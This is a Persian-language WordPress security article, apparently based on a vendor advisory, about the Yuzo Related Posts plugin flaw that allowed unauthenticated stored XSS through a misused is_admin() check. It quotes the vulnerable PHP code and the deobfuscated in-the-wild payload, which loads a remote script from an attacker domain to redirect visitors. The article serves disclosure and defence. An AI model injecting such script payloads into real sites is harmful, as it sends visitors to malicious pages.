تبلیغات تبلیغات
حراجی دامنه های ویژهمشاهده
آخرین ارسال های تالار مشاهده انجمن
درخواست پلاگین 1 پاسخ 118 بازدید افزونه ساخت شماره مجازی 14 پاسخ 806 بازدید درخواست افزونه 1 پاسخ 153 بازدید بهترین رباط اینستاگرام 0 پاسخ 2 بازدید درخواست قالب با سبک کندو 1 پاسخ 435 بازدید اسکریپت vfm 3 پاسخ 266 بازدید به هم ریختگی سایت بعد از نصب قالب 2 پاسخ 386 بازدید نمایش کد های php 0 پاسخ 166 بازدید مشکل در اسکریپت مچ فرم 0 پاسخ 341 بازدید واگذاری سرویس هاست اختصاصی ووکامرس 0 پاسخ 391 بازدید
تبلیغات
تبلیغات تبلیغات

جلوگیری از هک شدن در وردپرس با حذف افزونه Yuzo Related Posts

افزونه ها , افزونه وردپرس

گاهی اوقات هک شدن سایت‌ها دلایل خیلی پیچیده‌ای ندارد و با یک اتفاق ساده مانند یک افزونه آسیب پذیر در وردپرس مواجه هستیم. چنین افزونه‌ای نیز می‌تواند امنیت سایت ما را تهدید کرده و باعث تخریب شود. چندی پیش خبر حمله به سایت با Easy WP SMTP را شنیدیم که با بروزرسانی افزونه مشکل برطرف شد. امروز نیز افزونه دیگری را معرفی می‌کنیم که با حذف آن می‌توان به جلوگیری از هک شدن در وردپرس کمک کرد.

 

افزونه Yuzo Related Posts که روی بیش از ۶۰۰۰۰ سایت وردپرسی نصب بود، در تاریخ ۳۰ مارس ۲۰۱۹ از مخزن وردپرس پاک شد و این امر به خاطر آسیب پذیری ناخواسته این افزونه و بی مسئولیتی توسعه دهندگان بود. در همان روز خبر آسیب پذیری آن توسط یک محقق امنیتی پخش شد. اکنون حملات XSS در حال سوء استفاده از این آسیب پذیری هستند. به نظر می‌رسد این حملات با حملاتی که به افزونه های Easy WP SMTP و Social Warfare شد ارتباط داشته باشد.

 

جلوگیری از هک شدن در وردپرس

قابلیت محافظت در برابر حملات XSS در افزونه Wordfence اکنون جلوی این گونه حملات را گرفته و هر دو دسته از افرادی که از نسخه رایگان و پرمیوم این افزونه استفاده می‌کنند در برابر حملات XSS محافظت خواهند شد. براساس نتایج بررسی عمیق ضعف امنیتی موجود، تیم توسعه دهنده افزونه Wordfence در نسخه جدید قابلیت محافظت در برابر حملات دیگر و جلوگیری از هک شدن در وردپرس را نیز اضافه کرده است. البته کاربرانی که از نسخه رایگان استفاده می‌کنند، این قابلیت‌ها را کمی دیرتر دریافت خواهند کرد.

جلوگیری از هک شدن در وردپرس با حذف افزونه Yuzo Related Posts

تابع ()is_admin حادثه آفرید

آسیب پذیری افزونه Yuzo Related Posts از عدم وجود احراز هویت در قسمت‌های مختلف افزونه که مربوط به ذخیره سازی تنظیمات افزونه در پایگاه داده هستند سرچشمه می‌گیرد. کد زیر در مسیر assets/ilenframework/core.php اصل مشکل افزونه است:

function __construct(){
if( ! is_admin() ){ // only front-end
self::set_main_variable();
return;
}elseif( is_admin() ){ // only admin
// set default if not exists
self::_ini_();

بعضی از توسعه دهندگان وردپرس به اشتباه، از تابع ()is_admin برای بررسی اینکه یک قطعه کد که نیازمند امتیاز مدیر کل است باید اجرا شود یا خیر استفاده می‌کنند، اما طبق مستندات وردپرس، این راه درست استفاده از این تابع نیست. در این سناریو، تابع ()_self::_ini برای تمامی صفحات ادمین مثل /wp-admin/options-general.php و /wp-admin/admin-post.php فراخوانی می‌شود که باعث شده یک پست به صفحات ذکر شده درخواست پردازش با استفاده از تابع ;()self::save_options ارسال کند تا بعدا توسط کد مذکور انجام شود.

 

نتیجه حاکی از حضور افزونه آسیب پذیر در وردپرس

نتیجه این است که یک حمله کننده که احراز هویت نشده است می‌تواند محتوای مخرب به سایت تزریق کند؛ مثل تزریق یک payload جاوا اسکریپت در تنظیمات افزونه که بتواند از این آسیب پذیری استفاده کند. این payload در قالب‌های HTML وارد می‌شود و توسط مرورگر کاربرانی که از این سایت‌های خطرناک استفاده می‌کنند، اجرا می‌شود. این مشکل امنیتی می‌تواند منجر به عدم دسترسی افراد به سایت شود یا اینکه آن‌ها را به سایت‌های نا امن منتقل کند یا در شرایطی با حساب کاربری ادمین کاری نداشته باشد و با آن مدارا کند. اما به هر حال باید عملیات جلوگیری از هک شدن در وردپرس انجام شود.

جلوگیری از هک شدن در وردپرس با حذف افزونه Yuzo Related Posts

سوء استفاده از این شکاف امنیتی می‌تواند منجر به ریدایرکت‌های مشکوک شود

اکنون پس از اینکه این افزونه آسیب پذیر در وردپرس با بی توجهی توسعه دهندگان افشا و وجود آن نیز ثابت شد، برخی از افزاد سودجو شروع به سوء استفاده و بهره برداری از سایت‌هایی کردند که افزونه Yuzo Related Posts را روی سایت خود نصب کرده بودند.

هم اکنون نیز این سوء استفاده‌ها در برخی از کدهای جاوا اسکریپت مثل کد مقدار yuzo_related_post_css_and_style دیده می‌شود که بصورت زیر است:

جلوگیری از هک شدن در وردپرس با حذف افزونه Yuzo Related Posts

بعد از رفع ابهام، مشخص می‌شود که کد بالا در حال انجام چه کاری است:

</style><script language=javascript>var elem=document.createElement('script');
elem.type='text/javascript';
elem.async=true;
elem.src='https://hellofromhony[.]org/counter';
document.getElementsByTagName('head')[0].appendChild(elem);</script>

وقتی کاربری از سایت تخریب شده‌ای که شامل payload بالا است، بازدید می‌کند، به صفحات کلاه‌برداری منتقل می‌شود. مثل صفحه زیر:

جلوگیری از هک شدن در وردپرس با حذف افزونه Yuzo Related Posts

۳ آسیب پذیری خطرناک و مشترک

تحقیقات نشان می دهد که تعداد حملات برای سوء استفاده از این افزونه آسیب پذیر در وردپرس انجام گرفته است، با تعداد حملاتی که بر روی شکاف امنیتی دو افزونه Social Warfare و Easy WP SMTP انجام گرفته است مشترکاتی دارد.

 

تا کنون در این حمله‌ها از یک اسکریپت مخرب که در hellofromhony[.]org میزبانی می‌شود، استفاده شده که تبدیل به آدرس۵۳ [.]۱۷۶٫۱۲۳٫۹ خواهد شد؛ همان IP که در حمله‌های افزونه های Social Warfare و Easy WP SMTP استفاده شد. هر سه این حمله‌ها از نوع stored XSS بود که کدهای مخرب را از طریق این شکاف امنیتی تزریق می‌کرد و کاربران را به صفحات دیگر و خطرناک ارجاع می‌داد. اکنون مطمئن هستیم که افراد سودجوی پشت این حمله‌های مخرب، مشترک هستند. و باید به سرعت عملیات جلوگیری از هک شدن در وردپرس را آغاز کرد.

 

نتیجه نهایی

همانطور که گفته شد، شکاف امنیتی یکی از افزونه های محبوب فاش شد که افرادی از این شکاف‌های امنیتی سوء استفاده کردند. همین امر، موضوع داشتن یک رویکرد امنیتی که شامل فایروال وردپرس می‌شود را برجسته‌تر می‌کند.

سایت‌هایی که این افزونه را نصب کرده‌اند، باید فورا آن را پاک کنند؛ حداقل تا زمانی که توسعه دهندگان این افزونه نسخه امن آن را ارائه کنند. کاربرانی که از افزونه Wordfence استفاده می‌کنند از شر این حملات در امان هستند. قوانین فایروال جدیدی بر روی افزونه قرار گرفته است که جلوی این حملات مخرب را بگیرد و طی چند روز آینده روی نسخه رایگان نیز اعمال خواهد شد.

این مقاله چقدر براتون مفید بود؟

از ۱ تا ۵ امتیاز بدید.

میانگین رتبه 0 / 5. تعداد رای : 0

تا حالا کسی رای نداده! اولین نفر شما باشید.

دانلود

هاست ارزان، لایت اسپید، سرور مجازی منطبق با اسکریپت های 20script کلیک کنید >
مطلب مفیدی بود ؟
نویسنده : تیم محتوای 20اسکریپت 0 افزونه ها , افزونه وردپرس
لینک کوتاه مطلب : https://www.20script.ir/?p=44867
کلمات کلیدی پست :
مطالب مرتبط
8,049ساخت پنجره های پاپ آپ در وردپرس با افزونه Simple Popup Manager تاریخ : 2017/08/25
8,375افزونه خبرنامه حرفه ای وردپرس WP Subscribe Pro نسخه 1.5.31 تاریخ : 2018/12/4
11,708سیستم پشتیبانی از طریق چت در وردپرس با افزونه Tidio Live Chat تاریخ : 2018/06/22
8,660افزونه کوپن هوشمند ووکامرس WooCommerce Smart Coupons تاریخ : 2018/07/7
12,556مدیریت فایل های گوگل درایو با افزونه Drivr برای وردپرس تاریخ : 2017/04/7
10,558دانلود افزونه تماس با ما Ninja Kick v.2.2.4 برای وردپرس تاریخ : 2015/01/11
9,760افزایش ویژگی‌های محصولات در ووکامرس با افزونه YITH WooCommerce Product Add-Ons تاریخ : 2018/09/17
10,392عملیات درون‌ ریزی در وردپرس تنها با یک کلیک با افزونه One Click Demo Import تاریخ : 2019/04/14
6,900افزونه کمک مالی در ووکامرس YITH Donations for WooCommerce تاریخ : 2018/10/5
7,989اشتراک گذاری آسان مطالب با افزونه Sociable تاریخ : 2016/04/7
15,172افزونه رزرواسیون و زمانبندی وردپرس Bookly نسخه 10.5 تاریخ : 2016/08/22
4,916افزونه افزایش سرعت وردپرس Gonzales تاریخ : 2018/09/5
برخی از قالب های وبلاگ - بیست اسکریپت
قالب عشق بین انگشت هاقالب عشق بین انگشت ها
قالب دخترونه و آرایشقالب دخترونه و آرایش
قالب زیبای ماشینقالب زیبای ماشین
قالب فانتزی و طنز چِشمقالب فانتزی و طنز چِشم
قالب دختر رویاییقالب دختر رویایی
قالب وبلاگ دکوراسیونقالب وبلاگ دکوراسیون
قالب وبلاگ کلبه و درختقالب وبلاگ کلبه و درخت
قالب دختر زیباقالب دختر زیبا
قالب پسرونه غمگینقالب پسرونه غمگین
قالب عاشقانه قلبقالب عاشقانه قلب
تبلیغات
تبلیغات